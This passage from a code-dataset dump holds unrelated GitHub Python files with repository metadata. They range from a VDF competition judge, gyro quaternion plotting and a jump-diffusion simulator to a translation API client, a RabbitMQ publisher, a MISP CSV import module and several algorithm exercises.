item.id,\n 'label': item.label,\n 'price': 0,\n 'rental_related': item.rental_related,\n 'price_per_unit': item.price_per_unit\n })\n\n return result\n","repo_name":"jonasbjoralt/dgsys2_server","sub_path":"dgsys2/view_utils.py","file_name":"view_utils.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37926358725","text":"\nfrom binascii import a2b_hex\nfrom inkfish.create_discriminant import create_discriminant\nfrom inkfish.classgroup import ClassGroup\n\n\ndef judge_entry(mystr):\n assert len(mystr) < 100000\n lines = mystr.strip().split(b'\\n')\n assert len(lines) == 3\n ds = set()\n for line in lines:\n # File format:\n # challenge(in hex) length a b c order\n vals = [x.strip() for x in line.strip().split(b' ')]\n assert len(vals) == 6\n length = int(vals[1])\n assert length < 5000\n assert all(len(x) < length for x in vals[2:])\n assert len(vals[0]) <= 32\n d = create_discriminant(a2b_hex(vals[0]), length)\n g = ClassGroup(int(vals[2]), int(vals[3]), int(vals[4]))\n assert g.discriminant() == d\n assert g != g.identity()\n order = int(vals[5])\n assert order > 1\n assert g ** order == g.identity()\n assert d not in ds\n ds.add(d)\n return -max(ds)\n\n\nif __name__ == '__main__':\n from sys import argv\n h = open(argv[1], 'rb')\n s = h.read()\n h.close()\n print(judge_entry(s))\n","repo_name":"Chia-Network/oldvdf-competition","sub_path":"tools/judge_entry.py","file_name":"judge_entry.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"21"} +{"seq_id":"8637743724","text":"import sys\nsys.stdin = open('3408.세가지 합 구하기_input.txt')\n\nT = int(input())\n\nfor tc in range(1, T+1):\n N = int(input())\n\n S1 = ( N * (N+1) ) // 2\n S2 = N ** 2\n S3 = N * (N+1)\n \n print(\"#{} {} {} {}\".format(tc, S1, S2, S3))","repo_name":"jade-min/Algorithm","sub_path":"SWEA/D3/3408.세가지 합 구하기_2nd.py","file_name":"3408.세가지 합 구하기_2nd.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17820198695","text":"\nimport sys\nsys.path.insert(0, 'libs')\nfrom collections import Counter\nfrom datetime import *\n\nimport logging\nfrom google.appengine.ext import db\n\nimport pytz\n\nfrom models import *\n\n\ndef get_progress_stats():\n progress_stats = []\n\n # get all classes\n query = Class.all()\n class_obj_list = query.fetch(1000)\n class_count = len(class_obj_list)\n\n progress_stats.append(['Number of Classes Queried', 1000])\n progress_stats.append(['Number of Classes Found', class_count])\n\n past_class_count = 0\n future_class_count = 0\n utc = pytz.UTC\n for class_obj in class_obj_list:\n class_datetime = utc.localize(class_obj.date_time)\n if class_datetime > datetime.now(pytz.utc):\n future_class_count = future_class_count + 1\n if class_datetime <= datetime.now(pytz.utc):\n past_class_count = past_class_count + 1\n\n progress_stats.append(['Number of Past Classes', past_class_count])\n progress_stats.append(['Number of Future Classes', future_class_count])\n\n # get all the classes that have been checked\n query = ClassesChecked.all()\n classes_checked_obj_list = query.fetch(1000)\n classes_checked_count = len(classes_checked_obj_list)\n classes_checked_percent = round((float(classes_checked_count) / class_count) * 100)\n\n progress_stats.append(['Percent of Classes Checked for Enrollments', classes_checked_percent])\n\n # get all enrollments\n query = Enrollment.all()\n enrollment_obj_list = query.fetch(1000)\n enrollment_count = len(enrollment_obj_list)\n\n progress_stats.append(['Number of Enrollments Queried', 1000])\n progress_stats.append(['Number of Enrollments Found', enrollment_count])\n\n # count grades checked relation\n query = GradesChecked.all()\n grades_checked_obj_list = query.fetch(1000)\n grades_checked_count = len(grades_checked_obj_list)\n\n progress_stats.append(['Number of Checked Grades Queried', 1000])\n progress_stats.append(['Number of Checked Grades Found', grades_checked_count])\n\n # get all enrollment times\n reg_time_list = []\n for enrollment in enrollment_obj_list:\n reg_time_list.append(enrollment.enrollment_date_time)\n\n\n # get all the enrollments that have grades\n enrollment_not_graded_count = 0\n for enrollment in enrollment_obj_list:\n if enrollment.test_score == 0:\n enrollment_not_graded_count = enrollment_not_graded_count + 1\n\n enrollment_not_graded_percent = round((float(enrollment_not_graded_count) / enrollment_count) * 100)\n\n progress_stats.append(['Percent of Enrollments Not Graded', enrollment_not_graded_percent])\n\n # compare enrollment date to grade\n data_point_list = []\n query = Enrollment.all()\n query.filter('test_score !=', 0)\n enrollment_graded_obj_list = query.fetch(100)\n for enrollment in enrollment_graded_obj_list:\n class_obj = Class.get_by_key_name(enrollment.class_key_name)\n td = class_obj.date_time - enrollment.enrollment_date_time\n data_point_list.append([round(td.total_seconds() / (24*60*60)), int(enrollment.test_score)])\n\n\n return {\n 'progress_stats': progress_stats,\n 'data_point_list': data_point_list,\n }\n\n\n\ndef get_progress_stats(info_to_breakdown):\n # get list of zip codes \n query = Student.all()\n query.filter('zip_code !=', 0)\n student_obj_list = query.fetch(1000)\n zip_code_count = len(student_obj_list)\n zip_code_list = []\n for student in student_obj_list:\n zip_code_list.append(student.zip_code[:5])\n\n zip_code_dist = Counter(zip_code_list)\n\n\n zip_code_dist_percents = []\n for key in zip_code_dist.keys():\n percent = round(float(zip_code_dist[key] * 100) / zip_code_count)\n zip_code_dist_percents.append([\"'\" + key + \"'\", percent])\n\n logging.info(zip_code_dist)\n\n return {\n 'zip_code_dist': zip_code_dist_percents,\n }\n","repo_name":"logston/cpr123-enrollment-watcher","sub_path":"view_subroutines.py","file_name":"view_subroutines.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3959739666","text":"from mpl_toolkits import mplot3d\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\nimport argparse\n\n\ndef ham_product(q1, q2):\n \"\"\" Returns Hamilton product q1q2 for two quaternions\n https://en.wikipedia.org/wiki/Quaternion#Hamilton_product\n \"\"\"\n prod = np.empty(4)\n prod[0] = q1[0]*q2[0] - q1[1]*q2[1] - q1[2]*q2[2] - q1[3]*q2[3]\n prod[1] = q1[0]*q2[1] + q1[1]*q2[0] + q1[2]*q2[3] - q1[3]*q2[2]\n prod[2] = q1[0]*q2[2] - q1[1]*q2[3] + q1[2]*q2[0] + q1[3]*q2[1]\n prod[3] = q1[0]*q2[3] + q1[1]*q2[2] - q1[2]*q2[1] + q1[3]*q2[0]\n return prod\n\n\ndef vec_quat_mult(vec, quat):\n \"\"\" Multiplies vector3 vec by unit quaternion quat and returns the \n resulting rotated vector\n \"\"\"\n vec_extended = np.concatenate((0, vec), axis=None)\n quat_inverse = np.array([quat[0], -quat[1], -quat[2], -quat[3]])\n final_prod = ham_product(ham_product(quat, vec_extended), quat_inverse)\n return final_prod[1:4]\n\n\ndef quat_from_axis_angle(axis, angle):\n \"\"\"Angle should be in radians CCW\n \"\"\"\n quat = np.empty(4)\n quat[0] = np.cos(angle/2)\n quat[1:4] = np.sin(angle/2) * axis\n return quat / np.linalg.norm(quat)\n\n\ndef update_sensor(frame_num, heading_data, axes_plot):\n axes_plot.set_data(heading_data[0:2, :frame_num+1])\n axes_plot.set_3d_properties(heading_data[2, :frame_num+1])\n return axes_plot\n\n\ndef quaternions_from_gyro(filename, verbose, line_offset, max_lines):\n quat_list = []\n prev_transf = np.array([1,0,0,0])\n basis_vecs = np.array([[1.,0,0],[0,1.,0],[0,0,1.]]) # These have to be explicity declared as floats\n with open(filename) as f:\n lines = f.readlines()[0:max_lines]\n print(\"Number of lines read: {0}\".format(len(lines)))\n for line in lines:\n data_points = line.split(' ')\n if data_points[0] == \"#\":\n continue\n first_col = line_offset if line_offset else 0\n # Why multiply by a factor of 33/10^6? \n # We divide by 1000 because the data is all multiplied by 1000 to convert floats to ints\n # Then we multiply by 33/1000 because the units are radians/sec and 33/1000 seconds have passed.\n gyro_vals = [float(data_points[first_col+i]) * (33.0 / 1000.0**2) for i in range(3)]\n if verbose:\n print(\"gyro vals: \", gyro_vals)\n\n # The first thing to notice is that all rotation is ~double-counted.\n # For example, moving perpendicular to the x-axis is rotation around\n # the z-axis and around the y-axis.\n quats = [quat_from_axis_angle(basis_vecs[i], 0.5 * gyro_vals[i]) for i in range(3)]\n curr_transf = ham_product(ham_product(quats[0], quats[1]), quats[2])\n \n curr_transf = ham_product(curr_transf, prev_transf)\n prev_transf = curr_transf\n quat_list.append(curr_transf)\n return quat_list\n\n\ndef madgwick_estimate(q_curr, gyro_data, elapsed_time):\n \"\"\"Implements the technique in the Madgwick paper using only gyro data.\n The only difference between this and the graph-gyro-data.py implementation \n is that we put all the gyro data into one quaternion instead of composing\n rotations.\n params:\n q_curr: current orientation quaternion in w,x,y,z form\n gyro_data: gyro data in x,y,z radians/second\n elapsed_time: time between readings in seconds\n \"\"\"\n q_gyro = np.zeros(4)\n q_gyro[1:4] = gyro_data\n q_dot = ham_product(q_curr, q_gyro) * 0.5\n q_new = q_curr + (q_dot * elapsed_time)\n return q_new / np.linalg.norm(q_new)\n\n\ndef madgwick_quat_from_gyro(filename, verbose, line_offset, max_lines):\n quat_list = []\n prev_transf = np.array([1,0,0,0])\n basis_vecs = np.array([[1.,0,0],[0,1.,0],[0,0,1.]]) # These have to be explicity declared as floats\n with open(filename) as f:\n lines = f.readlines()[0:max_lines]\n print(\"Number of lines read: {0}\".format(len(lines)))\n for line in lines:\n data_points = line.split(' ')\n if data_points[0] == \"#\":\n continue\n first_col = line_offset if line_offset else 0\n # All values from the data are divided by 1000.0 because they were\n # multiplied by 1000 to convert from int to float.\n gyro_vals = [float(data_points[first_col+i]) * (1 / 1000.0) for i in range(3)]\n gyro_vals = np.array(gyro_vals)\n\n curr_transf = madgwick_estimate(prev_transf, gyro_vals, 33.0/1000)\n \n prev_transf = curr_transf\n quat_list.append(curr_transf)\n return quat_list\n\n\n\nif __name__=='__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"file\", help=\"Filepath of the data to use\")\n parser.add_argument(\"--offset\", \"--o\", help=\"Number of columns into the data file to start reading\", type=int)\n parser.add_argument(\"--maxlines\", \"--max\", help=\"Max number of rows to read from file\", type=int)\n parser.add_argument(\"--verbose\", \"--v\", help=\"Use to enable print statements\", action=\"store_true\")\n args = parser.parse_args()\n\n x_vec = np.array([1,0,0])\n z_vec = np.array([0,0,1])\n\n # It is not clear whether the gyro data is in degrees or radians so I am going to\n # check by reading the values.\n # Update: Since we rotate at a rate of no more than 1.15 units / sec, \n # it's probably radians.\n\n # quat_list = []\n # prev_transf = np.array([1,0,0,0])\n # basis_vecs = np.array([[1.,0,0],[0,1.,0],[0,0,1.]]) # These have to be explicity declared as floats\n # with open(args.file) as f:\n # lines = f.readlines()[0:args.maxlines]\n # print(\"Number of lines read: {0}\".format(len(lines)))\n # for line in lines:\n # data_points = line.split(' ')\n # if data_points[0] == \"#\":\n # continue\n # first_col = args.offset if args.offset else 0\n # # Why multiply by a factor of 33/10^6? \n # # We divide by 1000 because the data is all multiplied by 1000 to convert floats to ints\n # # Then we multiply by 33/1000 because the units are radians/sec and 33/1000 seconds have passed.\n # gyro_vals = [float(data_points[first_col+i]) * (33.0 / 1000.0**2) for i in range(3)]\n # if args.verbose:\n # print(\"gyro vals: \", gyro_vals)\n\n # # The first thing to notice is that all rotation is ~double-counted.\n # # For example, moving perpendicular to the x-axis is rotation around\n # # the z-axis and around the y-axis.\n # quats = [quat_from_axis_angle(basis_vecs[i], 0.5 * gyro_vals[i]) for i in range(3)]\n # curr_transf = ham_product(ham_product(quats[0], quats[1]), quats[2])\n \n # curr_transf = ham_product(curr_transf, prev_transf)\n # prev_transf = curr_transf\n # quat_list.append(curr_transf)\n data_quats = madgwick_quat_from_gyro(args.file, args.verbose, args.offset, args.maxlines)\n\n x_vec = np.array([1,0,0])\n x_orientations = []\n for quat in data_quats:\n x_curr = vec_quat_mult(x_vec, quat)\n x_orientations.append(x_curr)\n \n x_pts = np.array(x_orientations).T\n if args.verbose:\n print(\"x_pts:\", x_pts)\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n pos_plot = ax.plot(x_pts[0], x_pts[1], x_pts[2], label='Position of sensor')[0]\n # plt.plot(times, angles)\n # plt.show()\n\n millisecond_interval = 33\n line_ani = animation.FuncAnimation(fig, update_sensor, frames=len(x_pts[0]), fargs=(x_pts, pos_plot), interval=millisecond_interval)\n plt.show()","repo_name":"jpiland16/hmv-scratchpad","sub_path":"data-playground/old_scripts/graph-gyro-data.py","file_name":"graph-gyro-data.py","file_ext":"py","file_size_in_byte":7695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34582602652","text":"# -*- coding: utf-8 -*-\n# Ohjelma mittaa lämpötilan ja kosteuden ja päivittää tiedot\n# Google Drivessä olevaan taulukkoon.\nimport gspread\nimport Adafruit_DHT\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom datetime import datetime\n\n# Sensori on mallia DHT11\nsensori = Adafruit_DHT.DHT11\n\npin = 23\t# Sääanturin datan sisääntulo\n\n# Sensori yrittää lukea dataa 15 kertaa kahden sekunnin välein\nkosteus, temp = Adafruit_DHT.read_retry(sensori, pin)\n\nif kosteus is not None and temp is not None:\n\n\t# Ottaa yhteyden Google Driveen tunnistiedoilla\n\tscope = ['https://www.googleapis.com/auth/drive']\n\tcreds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)\n\tclient = gspread.authorize(creds)\n\n\t# Avataan Temperature taulukon ensimmäinen välilehti\n\tsheet = client.open(\"Temperature\").sheet1\n\n\t# Lisätään uusi rivi edellisten jälkeen\n\trow = [datetime.now().strftime('%Y-%m-%d %H:%M:%S'),temp,kosteus]\n\tsheet.append_row(row)","repo_name":"anttiheimonen/tiea345","sub_path":"Demo3/d3t2.py","file_name":"d3t2.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22904016152","text":"# Adamın çözdüğü\n# Çözüm sayısı 0 | Hedef 5 çözüm\nclass Solution(object):\n def isSubsequence(self, s, t):\n i, j = 0, 0\n \n while len(s) > i and len(t) > j:\n if len(s) > i and s[i] == t[j]:\n i += 1\n j += 1\n \n return len(s) == i\n ","repo_name":"merthamit/Over-300-leetcode-solutions","sub_path":"leetcodes questions/392.py","file_name":"392.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"24917142216","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# multi-asset jump diffusion model\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass multiJumpDiffusion:\n\n def __init__(self, m=None, spot_init=None, T=None, N=None, cov=None, prob1=None, prob2=None):\n\n self.m = m\n self.spot_init = spot_init\n self.T = T\n self.N = N\n self.cov = cov\n self.prob1 = prob1\n self.prob2 = prob2\n\n def gen_process(self):\n\n dt = self.T / self.N\n sigma = np.zeros(2)\n processes = np.zeros((self.N, 2))\n processes[0, :] = np.log(self.spot_init)\n\n drift = np.zeros(2)\n diffusion = np.zeros(2)\n\n for i in range(1, self.N):\n z1 = np.random.normal(0, 1)\n sigma[0] = np.sqrt(cov[0, 0])\n sigma[1] = np.sqrt(cov[1, 1])\n\n drift = 0.5 * (sigma ** 2) * dt\n diffusion = np.sqrt(self.T / self.N) * np.matmul(np.linalg.cholesky(self.cov),\n np.random.normal(0, 1, size=2))\n jump = self.gen_jump(sigma[0], sigma[1])\n\n processes[i, :] = processes[i - 1, :] - drift + diffusion + jump\n\n return np.exp(processes)\n\n def gen_jump(self, sigma1=None, sigma2=None):\n\n jump = np.zeros(2)\n a1 = np.zeros(2)\n a2 = np.zeros(2)\n a3 = np.zeros(2)\n zero = np.zeros(2)\n\n a1[:] = 0\n a2[:] = 0\n a3[:] = 0\n\n z = np.zeros(3)\n z[0] = 1\n z[1] = 2\n z[2] = 3\n\n val = np.random.choice(z, 1, p=[1 - self.prob1 - self.prob2, self.prob1, self.prob2])\n\n if val == 1:\n jump = (self.m * np.random.exponential() + np.sqrt(np.random.exponential()) * np.random.multivariate_normal(\n zero, self.cov))\n elif val == 2:\n jump = [\n sigma1 * np.random.exponential() + np.sqrt(np.random.exponential()) * np.random.normal(0, sigma1 ** 2),\n 0]\n elif val == 3:\n jump = [0, sigma2 * np.random.exponential() + np.sqrt(np.random.exponential()) * np.random.normal(0,sigma2 ** 2)]\n\n return np.random.poisson(1 * self.T / self.N, size=2) * jump\n\n def gen_path(self, nbPaths=None):\n\n dt = np.divide(self.T, self.N)\n dualPaths = np.zeros(((nbPaths, self.N, 2)))\n\n for i in range(nbPaths):\n dualPaths[i, :, :] = self.gen_process()\n\n return dualPaths\n\nm = np.array([0.1, 0.2])\nspot_init = np.array([100, 100])\nT = 1\nN = 30\ncov = np.array([[0.1, 0.05], [0.05, 0.1]])\nprob1 = 0.2\nprob2 = 0.2\n\ntest = multiJumpDiffusion(m=m, spot_init=spot_init, T=T, N=N, cov=cov, prob1=prob1, prob2=prob2)\nhihi = test.gen_path(1)\n# working fine\n","repo_name":"eidonia/rainbow-deep-hedging","sub_path":"dynamics/multiJumpDiffusion.py","file_name":"multiJumpDiffusion.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"41726454562","text":"# Tugas Dasar Dasar Pemgragraman - Tugas ke 5\n# Oleh Febry Billiyagi Karsidi dari TI02\n# Program menghitung Luas & Keliling dari Jajargenjang\n\nprint('''\nProgram menghitung Luas & Keliling Jajargenjang, pilih salah satu nomor\n1). Luas\n2). Keliling\n''')\nchoosenMenu = int(input(': '))\n\nif choosenMenu == 1:\n print(\"Operasi menghitung Luas jajargenjang\")\n alas = int(input(\"Alas: \"))\n tinggi = int(input(\"Tinggi: \"))\n result = alas * tinggi\n print('hasilnya adalah: ', result)\nelif choosenMenu == 2:\n print(\"Operasi menghitung Keliling jajargenjang\")\n alas = int(input(\"Alas: \"))\n tinggi = int(input(\"Sisi miring: \"))\n result = 2 * (alas+tinggi)\n print('hasilnya adalah: ', result)\nelse: \n print(\"Terjadi Kesalahan, Ulangi Program\")","repo_name":"billiyagi/myPython","sub_path":"DDP Tugas 5/DDP-Luas dan keliling Jajargenjang-Febry Billiyagi Karsidi-TI02.py","file_name":"DDP-Luas dan keliling Jajargenjang-Febry Billiyagi Karsidi-TI02.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7541512153","text":"import json\nimport os\nfrom ..base_translation_client import BaseTranslationClient\nfrom volcengine.ApiInfo import ApiInfo\nfrom volcengine.Credentials import Credentials\nfrom volcengine.ServiceInfo import ServiceInfo\nfrom volcengine.base.Service import Service\n\n\nclass HuoShanTranslationClient(BaseTranslationClient):\n\n access_key: str\n secret_key: str\n service_info: ServiceInfo\n query: dict[str, str]\n api_info: dict\n service: Service\n\n def __init__(self) -> None:\n\n self.access_key = os.environ.get(\"HUO_SHAN_ACCESS_KEY\")\n self.secret_key = os.environ.get(\"HUO_SHAN_SECRET_KEY\")\n self.service_info = ServiceInfo('translate.volcengineapi.com',\n {'Content-Type': 'application/json'},\n Credentials(self.access_key, self.secret_key,\n 'translate', 'cn-north-1'),\n 5,\n 5)\n self.query = {\n 'Action': 'TranslateText',\n 'Version': '2020-06-01'\n }\n self.api_info = {\n 'translate': ApiInfo('POST', '/', self.query, {}, {})\n }\n self.service = Service(self.service_info, self.api_info)\n\n def translation(self, text: str, target_language: str) -> str:\n body = {\n 'TargetLanguage': target_language,\n 'TextList': [text],\n }\n res = self.service.json('translate', {}, json.dumps(body))\n res = json.loads(res)\n translation = res[\"TranslationList\"][0][\"Translation\"]\n return translation\n","repo_name":"yakami129/VirtualWife","sub_path":"domain-chatbot/apps/speech/translation/huoshan/huoshan_translation_client.py","file_name":"huoshan_translation_client.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":535,"dataset":"github-code","pt":"21"} +{"seq_id":"4825381664","text":"import pika\r\nimport time\r\n\r\ncredentials = pika.PlainCredentials('huotong', '123456')\r\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\r\n 'localhost', credentials=credentials))\r\nchannel = connection.channel()\r\n\r\n# 声明queue\r\nchannel.queue_declare(queue='task_queue', durable=True)\r\n\r\n# n RabbitMQ a message can never be sent directly to the queue, it always needs to go through an exchange.\r\nimport sys\r\n\r\nmessage = ' '.join(sys.argv[1:]) or \"Hello World! %s\" % time.time()\r\n\r\nchannel.basic_publish(exchange='',\r\n routing_key='task_queue',\r\n body=message,\r\n properties=pika.BasicProperties(\r\n delivery_mode=2, # make message persistent\r\n )\r\n\r\n )\r\nprint(\" [x] Sent %r\" % message)\r\nconnection.close()\r\n","repo_name":"huotong1212/mylearnpy","sub_path":"pythoin面试准备/rabbitdemo/send_msg_safe.py","file_name":"send_msg_safe.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39609543016","text":"from typing import Dict, List\n\nfrom domain import utils\nfrom domain.enums import Language\nfrom domain.evaluations import Evaluation, Question\nfrom infra.repositories.general_repository import AINTERVIEWER_CLIENT\n\nEVALUATIONS_COLLECTION = AINTERVIEWER_CLIENT.evaluations\n\n\ndef insert_evaluation(evaluation: Evaluation):\n EVALUATIONS_COLLECTION.insert_one(evaluation.to_dict())\n\n\ndef find_evaluation_by_id(evaluation_id: str):\n evaluation_data = EVALUATIONS_COLLECTION.find_one({'_id': evaluation_id})\n if evaluation_data:\n return deserialize_evaluation(evaluation_data)\n\n\ndef find_evaluations_by_project_id(project_id: str) -> List[Evaluation]:\n evaluations = []\n evaluation_list = EVALUATIONS_COLLECTION.find({'project_id': project_id})\n for evaluation_data in evaluation_list:\n evaluations.append(deserialize_evaluation(evaluation_data))\n\n return evaluations\n\n\ndef update_evaluation(evaluation: Evaluation):\n EVALUATIONS_COLLECTION.update_one(\n {'_id': evaluation.id},\n {'$set': {\n 'name': evaluation.name,\n 'description': evaluation.description,\n 'language': evaluation.language.name,\n 'questions': [question.to_dict() for question in\n evaluation.questions] if evaluation.questions else None\n }}\n )\n\n\ndef deserialize_evaluation(evaluation_data: Dict) -> Evaluation:\n return Evaluation(\n id=evaluation_data.get('_id'),\n project_id=evaluation_data.get('project_id'),\n name=evaluation_data.get('name'),\n description=evaluation_data.get('description'),\n language=Language[evaluation_data.get('language')],\n questions=deserialize_questions(evaluation_data.get('questions')) if evaluation_data.get(\n 'questions') else None\n )\n\n\ndef deserialize_questions(questions_list_data: List):\n questions = []\n for question_data in questions_list_data:\n questions.append(\n Question(\n id=question_data.get('_id'),\n text=question_data.get('text'),\n mandatory=question_data.get('mandatory'),\n time_to_respond=utils.get_time_from_str(question_data.get('time_to_respond')),\n )\n )\n\n return questions\n","repo_name":"AInterviewer/ainterviewer_services","sub_path":"src/infra/repositories/evaluation_repository.py","file_name":"evaluation_repository.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73026916853","text":"import sys; sys.path.insert(0, '../../')\nimport geoplot as gplt\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\nfrom shapely.geometry import Point\nimport pandas as pd\nimport mplleaflet\n\n\n# Shape the data.\ntroop_positions = pd.read_fwf(\"../../data/napoloen/troops.txt\")\ntroop_positions = gpd.GeoDataFrame(data=troop_positions,\n geometry=troop_positions\\\n .apply(lambda srs: Point(srs['long'], srs['lat']),\n axis='columns'))\n\nsubsrs = []\nfor a, b in zip(range(len(troop_positions) - 1), range(1, len(troop_positions))):\n srs = troop_positions.iloc[b]\n srs = srs.rename({'geometry': 'from'})\n srs['to'] = troop_positions.iloc[a].geometry\n subsrs.append(srs)\ntroop_movements = pd.concat(subsrs, axis=1).T\ntroop_movements = troop_movements[['survivors', 'direction', 'group', 'from', 'to']]\ntroop_movements['direction'] = troop_movements.direction.map(lambda d: 0 if d == 'A' else 1)\n\n\n# Plot the data.\n\n# We'll use a custom colormap, to match the one that Minard uses.\nfrom matplotlib.colors import LinearSegmentedColormap\ncolors = [(215/255, 193/255, 126/255), (37/255, 37/255, 37/255)]\ncm = LinearSegmentedColormap.from_list('minard', colors)\n\n\ngplt.sankey(troop_movements, start='from', end='to',\n scale='survivors', limits=(0.5, 45),\n hue='direction', categorical=True, cmap=cm)\nfig = plt.gcf()\nmplleaflet.save_html(fig, fileobj='minard-napoleon-russia.html')","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/ResidentMario_geoplot/geoplot-master/docs/examples/minard-napoloen-russia.py","file_name":"minard-napoloen-russia.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"23970154525","text":"# -*- coding: utf-8 -*-\nimport json, os, base64\nimport pymisp\n\nmisperrors = {'error': 'Error'}\nmispattributes = {'inputSource': ['file'], 'output': ['MISP attributes']}\nmoduleinfo = {'version': '0.1', 'author': 'Christian Studer',\n 'description': 'Import Attributes from a csv file.',\n 'module-type': ['import']}\nmoduleconfig = ['header']\n\nduplicatedFields = {'mispType': {'mispComment': 'comment'},\n 'attrField': {'attrComment': 'comment'}}\n\nclass CsvParser():\n def __init__(self, header):\n self.header = header\n self.attributes = []\n\n def parse_data(self, data):\n return_data = []\n for line in data:\n l = line.split('#')[0].strip() if '#' in line else line.strip()\n if l:\n return_data.append(l)\n self.data = return_data\n # find which delimiter is used\n self.delimiter, self.length = self.findDelimiter()\n\n def findDelimiter(self):\n n = len(self.header)\n if n > 1:\n tmpData = []\n for da in self.data:\n tmp = []\n for d in (';', '|', '/', ',', '\\t', ' ',):\n if da.count(d) == (n-1):\n tmp.append(d)\n if len(tmp) == 1 and tmp == tmpData:\n return tmpData[0], n\n else:\n tmpData = tmp\n else:\n return None, 1\n\n def buildAttributes(self):\n # if there is only 1 field of data\n if self.delimiter is None:\n mispType = self.header[0]\n for data in self.data:\n d = data.strip()\n if d:\n self.attributes.append({'types': mispType, 'values': d})\n else:\n # split fields that should be recognized as misp attribute types from the others\n list2pop, misp, head = self.findMispTypes()\n # for each line of data\n for data in self.data:\n datamisp = []\n datasplit = data.split(self.delimiter)\n # in case there is an empty line or an error\n if len(datasplit) != self.length:\n continue\n # pop from the line data that matches with a misp type, using the list of indexes\n for l in list2pop:\n datamisp.append(datasplit.pop(l).strip())\n # for each misp type, we create an attribute\n for m, dm in zip(misp, datamisp):\n attribute = {'types': m, 'values': dm}\n for h, ds in zip(head, datasplit):\n if h:\n attribute[h] = ds.strip()\n self.attributes.append(attribute)\n\n def findMispTypes(self):\n descFilename = os.path.join(pymisp.__path__[0], 'data/describeTypes.json')\n with open(descFilename, 'r') as f:\n MispTypes = json.loads(f.read())['result'].get('types')\n list2pop = []\n misp = []\n head = []\n for h in reversed(self.header):\n n = self.header.index(h)\n # fields that are misp attribute types\n if h in MispTypes:\n list2pop.append(n)\n misp.append(h)\n # handle confusions between misp attribute types and attribute fields\n elif h in duplicatedFields['mispType']:\n # fields that should be considered as misp attribute types\n list2pop.append(n)\n misp.append(duplicatedFields['mispType'].get(h))\n elif h in duplicatedFields['attrField']:\n # fields that should be considered as attribute fields\n head.append(duplicatedFields['attrField'].get(h))\n # otherwise, it is an attribute field\n else:\n head.append(h)\n # return list of indexes of the misp types, list of the misp types, remaining fields that will be attribute fields\n return list2pop, misp, list(reversed(head))\n\ndef handler(q=False):\n if q is False:\n return False\n request = json.loads(q)\n if request.get('data'):\n data = base64.b64decode(request['data']).decode('utf-8')\n else:\n misperrors['error'] = \"Unsupported attributes type\"\n return misperrors\n if not request.get('config') and not request['config'].get('header'):\n misperrors['error'] = \"Configuration error\"\n return misperrors\n config = request['config'].get('header').split(',')\n config = [c.strip() for c in config]\n csv_parser = CsvParser(config)\n csv_parser.parse_data(data.split('\\n'))\n # build the attributes\n csv_parser.buildAttributes()\n r = {'results': csv_parser.attributes}\n return r\n\ndef introspection():\n return mispattributes\n\ndef version():\n moduleinfo['config'] = moduleconfig\n return moduleinfo\n","repo_name":"truckydev/misp-modules","sub_path":"misp_modules/modules/import_mod/csvimport.py","file_name":"csvimport.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"16027200714","text":"# 소수 경로, G4, 그래프, 에라토스테네스의 체\nfrom sys import stdin\nfrom collections import deque\n\ndef findPrime():\n # 에라토스테네스의 체(제곱근 범위까지 조사)\n for i in range(2, 100):\n # 소수인 상태에서 소수의 배수를 체크해줘야 함\n if prime[i] == True:\n # 소수의 배수 체크\n for j in range(2*i, 10000, i):\n prime[j] = False\n\ndef bfs(a,b):\n q = deque()\n q.append([a, 0])\n visited = [0 for _ in range(10000)]\n visited[a] = 1\n while q:\n now, cnt = q.popleft()\n strNow = str(now)\n if now == b:\n return cnt\n for i in range(4):\n for j in range(10):\n tmp = int(strNow[:i] + str(j) + strNow[i+1:])\n if visited[tmp] == 0 and prime[tmp] and tmp > 999:\n visited[tmp] = 1\n q.append([tmp, cnt + 1])\n\nT = int(stdin.readline())\n\nprime = [True for _ in range(10000)]\nfindPrime()\n\nfor _ in range(T):\n a, b = map(int, stdin.readline().split())\n res = bfs(a,b)\n print(res if res != None else 